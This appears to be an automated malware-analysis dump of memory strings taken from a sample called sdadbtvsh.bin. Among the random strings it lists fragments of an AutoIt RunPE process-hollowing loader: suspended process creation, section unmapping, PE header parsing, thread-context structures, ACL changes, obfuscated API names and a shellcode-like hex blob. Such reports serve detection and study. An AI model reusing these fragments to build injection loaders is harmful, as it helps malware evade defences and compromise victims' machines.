memstr_3e6806b2-d |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: 882t0k54i8t9ai5a) |
memstr_27b11c54-2 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: y0a8yy0hflh848qg |
memstr_dd5cfb6c-8 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: 332ke |
memstr_4d7a73e7-2 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: k763139foz4_) |
memstr_9d23a726-c |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: 9r9b5quscc091oj0k23 |
memstr_854f03b9-9 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: 5637s4z0o52bvt5u) |
memstr_94ea1ef3-4 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: local $tenries, $idata, $taddress51 |
memstr_224a0319-c |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: local $iflag = 3 + 7 * $fimagex64oy |
memstr_d69592a3-8 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: zd^}h |
memstr_6a162025-8 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: i)"k? |
memstr_1bb8f79a-4 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: td00133 |
memstr_1b950a3e-7 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: cyx04n6ph39ikt68jl5obfa47w4 |
memstr_cbeae223-0 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: 5p69k4zs5adqm |
memstr_6320f77b-1 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: ~n.a@ |
memstr_c859f5f1-7 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: sq8hx3s2n81 |
memstr_92d937b8-8 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: b1t5uu |
memstr_8ffeddff-1 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: 7o2a89423m035xwncaz6uebu05ovgy454k2v |
memstr_78d0121f-7 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: $var106 = dllstructgetptr($var93) |
memstr_a4d413c7-5 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: $var108 = dllstructgetptr($var95) |
memstr_509da4ca-f |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: for $i = 1 to $inumberofsectionse9 |
memstr_fcafe5cf-5 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: if @error or $acall[0] = -1 then |
memstr_73efa1ad-b |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: func __runpe($binary, $sexemodule) |
memstr_a84fb245-1 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: kgjjx8k1rj45* |
memstr_359486ee-a |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: 0jv4a145f3j6t12qjlq0g7dob790ff |
memstr_55cf6d1c-6 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: 29563ie7t2142u6 |
memstr_00c957ae-3 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: __runpe($bbinaryimage, $sexemodule) |
memstr_6b023c3f-a |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: 3^lm*# |
memstr_a7880254-7 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: 'ke5r |
memstr_695c8843-a |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: dllstructsetdata($var93, 6, "1")' |
memstr_08559960-e |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: 58a05f85vrqpzyc70uhll |
memstr_1f220191-c |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: dllstructsetdata($var93, 7, "0") |
memstr_85ce0bbb-6 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: ^kaxr%d |
memstr_9728b166-0 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: kiqs* |
memstr_4a8dbbfb-7 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: 0x40fdh57of7cra |
memstr_84ed0d66-5 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: g61a0z6b9gb |
memstr_afd6d3fd-6 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: 0xs0691ov5oonqn86m456l139x0 |
memstr_2aef0417-8 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: 864rodt |
memstr_b7fa1220-7 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: i@-?u\ |
memstr_952ea3f6-4 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: t1c' |
memstr_c583d097-e |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: 4itb9a3497r8wky |
memstr_97a3b755-e |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: f08s6n9478yz7x |
memstr_514e286f-5 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: osq^f |
memstr_59ba1039-0 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: $var110 = dllcall("advapi32.dll", "dword", "setentriesinacla", "ulong", "1", "ptr", $var106, "ptr", "0", "ptr", $var108) |
memstr_e62aa5b4-8 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: $var113 = dllcall("advapi32.dll", "dword", "setsecurityinfo", "handle", $var92, "int", "6", "dword", "0x00000004", "dword", "0", "dword", "0", "ptr", dllstructgetdata($var95, 1), "ptr", 0) |
memstr_df0d5134-4 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: if not ubound($var110) then return seterror(4, 0, false) |
memstr_1210144c-2 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: if not ubound($var113) then return seterror(5, 0, false) |
memstr_a6084d8e-1 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: dllstructsetdata($tmodule, 1, dllstructgetdata($theaders, 1))/$ |
memstr_9b44293f-c |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: local $smagic = dllstructgetdata($timage_dos_header, "magic") |
memstr_357ad393-7 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: if $var110[0] <> 0 then return seterror(6, $var110[0], false)a$u |
memstr_e2253d7a-4 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: if $var113[0] <> 0 then return seterror(7, $var113[0], false) |
memstr_531db188-a |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: if $fautoitx64 and _runbinary_iswow64process($handlerpro) thens%c |
memstr_feebff9f-a |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: t`xvp |
memstr_afdcca5e-6 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: hl0vp |
memstr_9f486204-f |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: ~pxp |
memstr_07ece005-7 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: =ghvp |
memstr_971b4a7e-c |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: endifl&_ |
memstr_2ed38096-9 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: elseq&d |
memstr_7f575c80-d |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: ^v`vp |
memstr_156ece7b-b |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: #pwp |
memstr_5b87c7e3-d |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: case 1 |
memstr_a4c3253c-0 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: case 2 |
memstr_51481cb9-2 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: case 3 |
memstr_cebd67c4-1 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: endif(' |
memstr_f6f04665-6 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: endif/' |
memstr_f6f5119e-5 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: case 3$' |
memstr_9b07f697-c |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: endif=' |
memstr_99f2f96e-a |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: endif]'` |
memstr_c1d0d251-a |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: func _runpe($bbinaryimage, $scommandline = '', $sexemodule = @autoitexe) |
memstr_989e5ce3-a |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: local $tbinary = dllstructcreate("byte[" & binarylen($bbinary) & "]") |
memstr_9411307d-0 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: local $tstartupinfo = dllstructcreate("dword cbsize;" & "ptr reserved;" & "ptr desktop;" & "ptr title;" & "dword x;" & "dword y;" & "dword xsize;" & "dword ysize;" & "dword xcountchars;" & "dword ycountchars;" & "dword fillattribute;" & "dword flags;" & "word showwindow;" & "word reserved2;" & "ptr reserved2;" & "ptr hstdinput;" & "ptr hstdoutput;" & "ptr hstderror") |
memstr_de68ad62-6 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: local $tprocess_information = dllstructcreate("ptr process;" & "ptr thread;" & "dword processid;" & "dword threadid") |
memstr_9eba84be-a |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: local $acall = dllcall("kernel32.dll", "bool", "createprocessw", "wstr", $sexemodule, "wstr", $scommandline, "ptr", 0, "ptr", 0, "int", 0, "dword", 4, "ptr", 0, "ptr", 0, "ptr", dllstructgetptr($tstartupinfo), "ptr", dllstructgetptr($tprocess_information)) |
memstr_bcde8035-5 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: if @error or not $acall[0] then return seterror(1, 0, 0) |
memstr_78bfe17c-a |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: local $ivirtualaddress, $isizeofblock, $inumberofentries ! |
memstr_5a1fc97a-4 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: local $tmagic = dllstructcreate("word magic;", $ppointer) |
memstr_afb80f61-9 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: if @error or not $acall[0] then return seterror(1, 0, 0) " |
memstr_bec0b261-6 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: if @error or not $acall[0] then return seterror(1, 0, 0)@"| |
memstr_8c20e9c1-b |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: func _runbinary_unmapviewofsection($handlerpro, $paddress) |
memstr_2035a622-4 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: local $handlerpro = dllstructgetdata($tprocess_information, "process") |
memstr_2b1a6f5d-4 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: dllcall("kernel32.dll", "bool", "term"&"inatepr"&"ocess", "handle", $handlerpro, "dword", 0)p |
memstr_42f0e62c-9 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: $tcontext = dllstructcreate("dword con" & "text" & "flags;" & "dword dr0; dword dr1; dword dr2; dword dr3; dword dr6; dword dr7;" & "dword controlword; dword statusword; dword tagword; dword erroroffset; dword errorselector; dword dataoffset; dword dataselector; byte registerarea[80]; dword cr0npxstate;" & "dword seggs; dword segfs; dword seges; dword segds;" & "dword edi; dword esi; dword ebx; dword edx; dword ecx; dword eax;" & "dword ebp; dword eip; dword segcs; dword eflags; dword esp; dword segss;" & "byte extendedregisters[512]")"u |
memstr_b928f963-e |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: local $timage_dos_header = dllstructcreate("char magic[2];" & "word bytesonlastpage;" & "word pages;" & "word relocations;" & "word sizeofheader;" & "word minimumextra;" & "word maximumextra;" & "word ss;" & "word sp;" & "word checksum;" & "word ip;" & "word cs;" & "word relocation;" & "word overlay;" & "char reserved[8];" & "word oemidentifier;" & "word oeminformation;" & "char reserved2[20];" & "dword addressofnewexeheader", $ppointer)64 |
memstr_e448c2a7-8 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: eptiontorip; ui |
memstr_877a363e-4 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: 1875f38/3f6b74/78/3f4b74/2ebe78bc55f5e5b595a5dc35552515356578b6c241c85ed74438b453c8b542878/3d58b4a188b5a2//3dde33/498b348b/3f533ff33c/fcac84c/74/7c1cf/d/3f8ebf43b7c242/75e18b5a24/3dd668b/c4b8b5a1c/3dd8b/48b/3c55f5e5b595a5dc3c3////////"3////"e;" & "dword environmentupdatecount;" & "ptr kernelcallbacktable;" & "ptr eventlogsection;" & "ptr eventlog;" & "ptr freelist;" & "dword tlsexpansioncounter;" & "ptr tlsbitmap;" & "dword tlsbitmapbits[2];" & "ptr readonlysharedmemorybase;" & "ptr readonlysharedmemoryheap;" & "ptr readonlystaticserverdata;" & "ptr ansicodepagedata;" & "ptr oemcodepagedata;" & "ptr unicodecasetabledata;" & "dword numberofprocessors;" & "dword ntglobalflag;" & "byte spare2[4];" & "int64 criticalsectiontimeout;" & "dword heapsegmentreserve;" & "dword heapsegmentcommit;" & "dword heapdecommittotalfreethreshold;" & "dword heapdecommitfreeblockthreshold;" & "dword numberofheaps;" & "dword maximumnumberofheaps;" & "ptr processheaps;" & "ptr gdisharedhandletable;" & "ptr processstarterhelper;" & "ptr gdidcattributelist;" & "ptr loaderlock;" & "dword osmajorversion;" & "dword osminorversion;" & "dword osbuildnumber;" & "dword osplatformid;" & "dword imagesubsystem;" & "dword imagesubsystemmajorversion;" & "dword imagesubsystemminorversion;" & "dword gdihandlebuffer[34];" & "dword postprocessinitroutine;" & "dword tlsexpansionbitmap;" & "byte tlsexpansionbitmapbits[128];" & "dword sessionid") |
memstr_223c5176-4 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: $tcontext = dllstructcreate("align 16; uint64 p1home; uint64 p2home; uint64 p3home; uint64 p4home; uint64 p5home; uint64 p6home;" & "dword cont" & "ext" & "flags; dword mxcsr;" & "word segcs; word segds; word seges; word segfs; word seggs; word segss; dword eflags;" & "uint64 dr0; uint64 dr1; uint64 dr2; uint64 dr3; uint64 dr6; uint64 dr7;" & "uint64 rax; uint64 rcx; uint64 rdx; uint64 rbx; uint64 rsp; uint64 rbp; uint64 rsi; uint64 rdi; uint64 r8; uint64 r9; uint64 r10; uint64 r11; uint64 r12; uint64 r13; uint64 r14; uint64 r15;" & "uint64 rip;" & "uint64 header[4]; uint64 legacy[16]; uint64 xmm0[2]; uint64 xmm1[2]; uint64 xmm2[2]; uint64 xmm3[2]; uint64 xmm4[2]; uint64 xmm5[2]; uint64 xmm6[2]; uint64 xmm7[2]; uint64 xmm8[2]; uint64 xmm9[2]; uint64 xmm10[2]; uint64 xmm11[2]; uint64 xmm12[2]; uint64 xmm13[2]; uint64 xmm14[2]; uint64 xmm15[2];" & "uint64 vectorregister[52]; uint64 vectorcontrol;" & "uint64 debugcontrol; uint64 lastbranchtorip; uint64 lastbranchfromrip; uint64 lastexceptiontorip; uint64 lastexceptionfromrip") |
memstr_4af418ca-9 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: dllcall("kernel32.dll", "bool", "term"&"inatepr"&"ocess", "handle", $handlerpro, "dword", 0) |
memstr_68895962-c |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: local $timage_nt_signature = dllstructcreate("dword signature", $ppointer) |
memstr_92c54b9c-3 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: if dllstructgetdata($timage_nt_signature, "signature") <> 17744 then |
memstr_064ee42e-6 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: local $timage_file_header = dllstructcreate("word machine;" & "word numberofsections;" & "dword timedatestamp;" & "dword pointertosymboltable;" & "dword numberofsymbols;" & "word sizeofoptionalheader;" & "word characteristics", $ppointer) |
memstr_49c2e699-a |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: local $inumberofsections = dllstructgetdata($timage_file_header, "numberofsections") |
memstr_4f62f5b1-2 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: $timage_optional_header = dllstructcreate("word magic;" & "byte majorlinkerversion;" & "byte minorlinkerversion;" & "dword sizeofcode;" & "dword sizeofinitializeddata;" & "dword sizeofuninitializeddata;" & "dword addressofentrypoint;" & "dword baseofcode;" & "dword baseofdata;" & "dword imagebase;" & "dword sectionalignment;" & "dword filealignment;" & "word majoroperatingsystemversion;" & "word minoroperatingsystemversion;" & "word majorimageversion;" & "word minorimageversion;" & "word majorsubsystemversion;" & "word minorsubsystemversion;" & "dword win32versionvalue;" & "dword sizeofimage;" & "dword sizeofheaders;" & "dword checksum;" & "word subsystem;" & "word dllcharacteristics;" & "dword sizeofstackreserve;" & "dword sizeofstackcommit;" & "dword sizeofheapreserve;" & "dword sizeofheapcommit;" & "dword loaderflags;" & "dword numberofrvaandsizes", $ppointer) |
memstr_b5e6a46b-0 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: $timage_optional_header = dllstructcreate("word magic;" & "byte majorlinkerversion;" & "byte minorlinkerversion;" & "dword sizeofcode;" & "dword sizeofinitializeddata;" & "dword sizeofuninitializeddata;" & "dword addressofentrypoint;" & "dword baseofcode;" & "uint64 imagebase;" & "dword sectionalignment;" & "dword filealignment;" & "word majoroperatingsystemversion;" & "word minoroperatingsystemversion;" & "word majorimageversion;" & "word minorimageversion;" & "word majorsubsystemversion;" & "word minorsubsystemversion;" & "dword win32versionvalue;" & "dword sizeofimage;" & "dword sizeofheaders;" & "dword checksum;" & "word subsystem;" & "word dllcharacteristics;" & "uint64 sizeofstackreserve;" & "uint64 sizeofstackcommit;" & "uint64 sizeofheapreserve;" & "uint64 sizeofheapcommit;" & "dword loaderflags;" & "dword numberofrvaandsizes", $ppointer) |
memstr_f521dc63-c |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: local $ientrypointnew = dllstructgetdata($timage_optional_header, "addressofentrypoint") |
memstr_9ecaadc9-a |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: local $ioptionalheadersizeofheadersnew = dllstructgetdata($timage_optional_header, "sizeofheaders") |
memstr_44fe8b5f-f |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: local $poptionalheaderimagebasenew = dllstructgetdata($timage_optional_header, "imagebase") |
memstr_0a5a2796-b |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: local $ioptionalheadersizeofimagenew = random(104857600, 209715200, 1) |
memstr_d2ff2c82-d |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: local $timage_dir3ctory_entry_basereloc = dllstructcreate("dword virtualaddress; dword size", $ppointer) |
memstr_95224542-4 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: local $paddressnewbasereloc = dllstructgetdata($timage_dir3ctory_entry_basereloc, "virtualaddress") |
memstr_b49ab16f-0 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: if $paddressnewbasereloc and $isizebasereloc then $frelocatable = true |
memstr_fdefa476-b |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: consolewrite("!!!not relocatable module. i will try but this may not work!!!" & @crlf) |
memstr_375d623e-7 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: $pzeropoint = _runbinary_allocateexespace($handlerpro, $ioptionalheadersizeofimagenew) |
memstr_b8cb1187-d |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: $pzeropoint = _runbinary_allocateexespaceataddress($handlerpro, $poptionalheaderimagebasenew, $ioptionalheadersizeofimagenew) |
memstr_cb0edd35-c |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: _runbinary_unmapviewofsection($handlerpro, $poptionalheaderimagebasenew) |
memstr_9c9e8b93-e |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: local $theaders = dllstructcreate("byte[" & $ioptionalheadersizeofheadersnew & "]", $pheaders_new) |
memstr_c06916d5-8 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: endfunc'4g |
memstr_b958d137-8 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: endfunc<4p |
memstr_07a1234f-5 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: case 185| |
memstr_67817d58-1 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: endif45 |
memstr_93c2a76e-1 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: case 25 |
memstr_beafd5bf-2 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: endfunc~5> |
memstr_f1468e40-8 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: endifp54 |
memstr_044c7d15-3 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: $timage_section_header = dllstructcreate("char name[8];" & "dword unionofvirtualsizeandphysicaladdress;" & "dword virtualaddress;" & "dword sizeofrawdata;" & "dword pointertorawdata;" & "dword pointertorelocations;" & "dword pointertolinenumbers;" & "word numberofrelocations;" & "word numberoflinenumbers;" & "dword characteristics", $ppointer) |
memstr_0a9754ba-5 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: $isizeofrawdata = dllstructgetdata($timage_section_header, "sizeofrawdata") |
memstr_1021f23f-d |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: $ppointertorawdata = $pheaders_new + dllstructgetdata($timage_section_header, "pointertorawdata") |
memstr_ebfa204c-5 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: $ivirtualaddress = dllstructgetdata($timage_section_header, "virtualaddress") |
memstr_1c67e194-b |
